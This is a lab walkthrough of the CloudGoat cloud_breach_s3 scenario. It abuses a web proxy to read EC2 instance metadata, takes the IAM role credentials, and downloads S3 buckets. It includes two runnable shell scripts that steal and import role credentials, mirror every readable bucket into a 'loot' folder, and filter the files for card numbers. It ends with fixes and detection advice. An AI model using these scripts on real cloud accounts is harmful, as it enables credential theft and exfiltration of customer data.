This walkthrough demonstrates a complete penetration test of the CloudGoat “cloud_breach_s3” scenario, showing how an EC2 instance whose web server proxies requests to the instance metadata service can be used to reach sensitive S3 data. The chain is: abuse the proxy to read the metadata service, pull the temporary IAM role credentials it serves, and use them to enumerate and download a restricted S3 bucket. Along the way it covers EC2 metadata service abuse, IAM credential extraction, and S3 bucket enumeration with an automated tool (CloudTap).
Initial Setup
Starting CloudGoat, we first whitelist our own IP so the scenario's security groups admit only us:

cloudgoat config whitelist --auto

Then create the scenario with CloudGoat's create command; its output includes the public IP of the target EC2 instance, which is the address used below.
Let’s start scanning the machine and see what ports are open:
nmap -Pn -sC -sV --top-ports=1000 54.224.25.16

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 30:20:b0:04:5a:56:28:9f:91:04:ad:3d:37:9f:64:77 (RSA)
|   256 ee:41:41:e5:55:9e:d9:39:fa:5b:53:b0:91:5f:ba:88 (ECDSA)
|_  256 d2:72:c2:f7:4b:1e:ca:05:16:96:3f:58:8d:ba:49:c6 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (application/octet-stream).
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There are two ports open 22 and 80. Let’s see what’s hosted on port 80 first:
curl http://54.224.25.16/

<h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1>
Exploiting the EC2 Metadata Service
The AWS EC2 instance metadata service lives at the link-local address http://169.254.169.254/latest/meta-data/ and is normally reachable only from the instance itself. This nginx front end forwards whatever request we send it to the metadata service, so by setting the Host header to 169.254.169.254 we can read the metadata from the outside. The interesting paths are the user data script (which may carry secrets or a flag) and /latest/meta-data/iam/security-credentials/, which lists the attached IAM role and, one level deeper, serves its temporary access key, secret key and session token.
With the credential document retrieved, we load the AccessKeyId and SecretAccessKey into a new AWS CLI profile, then add the session token separately, because the interactive aws configure prompts do not ask for it and the keys are useless without it:

aws configure --profile init

aws configure set aws_session_token "<TOKEN>" --profile init
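As an added example (not from the original walkthrough), the following script shows the two steps that sit between the curl output above and the profile configuration: sending requests through the nginx proxy with the Host header set to 169.254.169.254, and turning the credential JSON the metadata service returns into an AWS CLI profile. The target IP and profile name are the ones used on this page; the role name is read from the service at run time, and the credential document at the bottom is a constructed sample with placeholder values used only to exercise the parser.

```shell
#!/bin/sh
# Added example: abuse a metadata-service proxy and import the role credentials
# into an AWS CLI profile. TARGET/PROFILE default to the values used on this page;
# SAMPLE_CREDS is a constructed document with placeholder values, not real keys.

TARGET="${TARGET:-54.224.25.16}"
IMDS_HOST="169.254.169.254"
PROFILE="${PROFILE:-init}"

# imds_get PATH: ask the proxy for PATH, but with the Host header of the
# metadata service, which is what the nginx front end forwards on.
imds_get() {
    curl -s -H "Host: ${IMDS_HOST}" "http://${TARGET}${1}"
}

# json_field NAME: extract a string value from the one-field-per-line JSON the
# metadata service returns (avoids a jq dependency on the attack box).
json_field() {
    sed -n "s/.*\"$1\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p"
}

# creds_to_profile PROFILE < creds.json: print the aws configure commands that
# load the temporary credentials, including the session token that the
# interactive `aws configure` prompt never asks for.
creds_to_profile() {
    prof="$1"
    json="$(cat)"
    akid="$(printf '%s\n' "$json" | json_field AccessKeyId)"
    secret="$(printf '%s\n' "$json" | json_field SecretAccessKey)"
    token="$(printf '%s\n' "$json" | json_field Token)"
    if [ -z "$akid" ] || [ -z "$secret" ] || [ -z "$token" ]; then
        echo "incomplete credential document" >&2
        return 1
    fi
    printf 'aws configure set aws_access_key_id %s --profile %s\n' "$akid" "$prof"
    printf 'aws configure set aws_secret_access_key %s --profile %s\n' "$secret" "$prof"
    printf 'aws configure set aws_session_token %s --profile %s\n' "$token" "$prof"
}

# steal_role_creds: list the attached role, fetch its credential document,
# load it into PROFILE and confirm the keys work. Network access required.
steal_role_creds() {
    role="$(imds_get /latest/meta-data/iam/security-credentials/)"
    if [ -z "$role" ]; then
        # An empty body means no role is attached, or IMDSv2 is required and the
        # token-less GET was rejected with 401.
        echo "no IAM role returned (none attached, or IMDSv2 required)" >&2
        return 1
    fi
    echo "role: $role" >&2
    imds_get "/latest/meta-data/iam/security-credentials/${role}" \
        | creds_to_profile "$PROFILE" | sh
    aws sts get-caller-identity --profile "$PROFILE"
}

# Constructed sample in the shape the metadata service returns; placeholders only.
SAMPLE_CREDS='{
  "Code" : "Success",
  "LastUpdated" : "2024-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLEKEYID",
  "SecretAccessKey" : "examplesecretkey",
  "Token" : "exampletoken",
  "Expiration" : "2024-01-01T06:00:00Z"
}'

# Only touch the network when explicitly asked: `sh steal.sh run`
if [ "${1:-}" = "run" ]; then
    steal_role_creds
fi
```

With no argument the script only defines the functions, so the parser can be exercised offline against SAMPLE_CREDS; `sh steal.sh run` performs the live steps. If the instance had IMDSv2 enforced (HttpTokens set to required), the plain GET for the role name would come back as 401 and this path would stop there, which is exactly why that setting is the fix for this class of exposure.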
Using CloudTap for Advanced Enumeration
I will be using CloudTap to enumerate the permissions of the role whose credentials we obtained. CloudTap is an AWS enumeration tool that tests which actions a set of credentials is allowed to perform and acts on what it finds, which saves walking the service APIs by hand during an assessment.
python3 CloudTap.py --keys init
The CloudTap tool has found an S3 bucket and automatically downloads it. Inside there is sensitive information about credit card numbers and IP addresses, which marks the end of this engagement.
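Added example, not part of the original write-up or of CloudTap: the manual AWS CLI equivalent of the enumeration CloudTap performed (confirm whose credentials these are, list the buckets the role can see, mirror them locally), followed by a Luhn check used to confirm that long digit runs in the downloaded files are plausible card numbers rather than order IDs or timestamps. The profile name is the one configured above; bucket names come from the live listing, and the text at the bottom is constructed sample data built from well-known test card numbers, not content from the scenario's bucket.

```shell
#!/bin/sh
# Added example: manual S3 enumeration with the stolen profile, then a Luhn
# filter to triage the downloaded data for card numbers. SAMPLE_DUMP is
# constructed test data (industry test PANs), not the scenario's real bucket.

PROFILE="${PROFILE:-init}"
LOOT="${LOOT:-./loot}"

# enumerate_s3: whoami, then list and mirror every bucket the role can read.
# Needs network access and the profile from the previous step.
enumerate_s3() {
    aws sts get-caller-identity --profile "$PROFILE"
    aws s3 ls --profile "$PROFILE" | awk '{print $3}' | while read -r bucket; do
        echo "syncing s3://$bucket" >&2
        aws s3 sync "s3://$bucket" "$LOOT/$bucket" --profile "$PROFILE"
    done
}

# luhn_valid DIGITS: return 0 if the digit string passes the Luhn checksum.
# Walks right to left, doubling every second digit and folding >9 to a digit.
luhn_valid() {
    printf '%s' "$1" | awk '
    {
        n = length($0); sum = 0; dbl = 0
        for (i = n; i >= 1; i--) {
            d = substr($0, i, 1) + 0
            if (dbl) { d *= 2; if (d > 9) d -= 9 }
            sum += d
            dbl = !dbl
        }
        exit (sum % 10 != 0)
    }'
}

# find_pans FILE: print unique 13-19 digit runs (spaces/dashes allowed between
# digits) that pass Luhn. IPs and short numbers never reach the length floor.
find_pans() {
    grep -Eo '([0-9][ -]?){12,18}[0-9]' "$1" | tr -d ' -' | sort -u | while read -r cand; do
        if luhn_valid "$cand"; then
            printf '%s\n' "$cand"
        fi
    done
}

# Constructed sample: two valid test PANs, one 16-digit string that fails Luhn,
# one 16-digit order id, and IP addresses that must not match at all.
SAMPLE_DUMP='customer,card,last_ip
alice,4111 1111 1111 1111,10.0.0.12
bob,1234-5678-1234-5678,192.168.1.20
carol,5500 0000 0000 0004,172.16.5.9
order-id 2024011500001234 placed by dave'

# Only touch the network when explicitly asked: `sh triage.sh run`
if [ "${1:-}" = "run" ]; then
    enumerate_s3
    find "$LOOT" -type f | while read -r f; do find_pans "$f"; done
fi
```

Running find_pans over the constructed sample yields only the two Luhn-valid numbers; the dashed 1234-5678 string and the order id are rejected, and the IP addresses are too short to be candidates. The same grep-then-checksum pass over the synced bucket is how to turn "there are credit card numbers in here" into a count you can put in a report.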
Conclusion
This CloudGoat walkthrough demonstrated a complete attack chain from initial reconnaissance to sensitive data exfiltration. The key vulnerabilities exploited were:
Misconfigured EC2 proxy allowing access to metadata service
Exposed IAM credentials through metadata service
Overprivileged S3 access leading to sensitive data exposure
Tools like CloudTap speed up the enumeration step, but the attack itself needed nothing more than curl and the AWS CLI. The fixes are equally plain: do not put a proxy in front of the metadata service; require IMDSv2 on the instance (aws ec2 modify-instance-metadata-options --http-tokens required) so that an unauthenticated GET like the one above returns 401 instead of credentials; and give the instance role only the S3 actions it needs on only the buckets it needs. On the detection side, instance-role credentials being used from an address outside the instance is the pattern GuardDuty's InstanceCredentialExfiltration findings are built for, and the attacker's first sts:GetCallerIdentity or s3:ListBuckets call with that role is the earliest signal in CloudTrail.